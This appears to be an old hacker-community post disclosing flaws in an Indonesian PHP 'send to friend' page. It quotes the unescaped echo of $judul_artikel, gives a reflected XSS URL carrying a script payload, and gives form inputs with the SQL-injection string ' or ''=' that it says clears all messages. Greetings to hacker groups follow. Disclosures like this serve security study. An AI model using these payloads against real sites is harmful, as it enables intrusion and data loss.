by : iFX a.k.a inversFX
β¦
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
β¦
we found something here, that's variable $judul_artikel
so we can xss from the url :
1st ex:
http://localhost/teman.php?judul_artikel=<script>alert("mati
dah gwa!!!")</script>
2nd ex:
or we can send an artikel to admin and the title had the
name = ' or ''=' <== old SQL
injection code
mail = test_string <== you can fill it with free mail
address
pesan = ' or ''=' <== old SQL injection code
then all message on it clear amazinglyβ¦
sory for my words In English, cuz I often REMED!!!
_________________
/Shout :| |X|
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius,
||||||||. |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe,
Shock-3d, G4mMa, Big_Red_One } |
---|
|OK | Apply | Cancel |
----------------------
========================================================================================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/